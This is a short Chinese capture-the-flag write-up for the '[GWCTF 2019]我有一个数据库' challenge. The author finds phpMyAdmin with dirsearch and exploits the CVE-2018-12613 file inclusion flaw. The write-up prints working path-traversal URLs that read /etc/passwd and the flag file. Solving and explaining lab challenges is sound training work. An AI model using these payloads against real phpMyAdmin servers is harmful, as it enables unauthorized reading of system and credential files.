奇怪的数据库

来自

[GWCTF 2019]我有一个数据库

抽象题目，但其实没啥技术含量，只需要你能找到切入关键就行。

打开一看就是中文乱码：

放到赛博厨子的magic里，开启intensive模块看看能不能梭出来东西：

看是看到了，但是没啥用啊。

源码也没东西。

记住，当你走投无路的时候，就用dirsearch扫吧，基本有信息泄露才会有进一步，除非题目的相关信息直接能搜出来。

数据库，啥也没有，只能扫了：

那就直接访问这个phpmyadmin和这几个目录试试，这个phpmyadmin是一个数据库管理系统：

（补充--看看百度百科的解释：）

也没啥信息，但是知道这个方向应该对了。

进来我也没啥方法，这里只有去搜phpmyadmin的漏洞，看看能不能黑了。

 

还真有，叫做：

文件包含，phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

即到4.8.1版本存在任意文件读取漏洞，这里可以文件路径穿越。

 

首先肯定是用经典的/etc/passwd试试水：

/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd

也可以：

/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd

那直接穿就完事了：

/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../../flag

确实没啥技术含量，就是要会搜。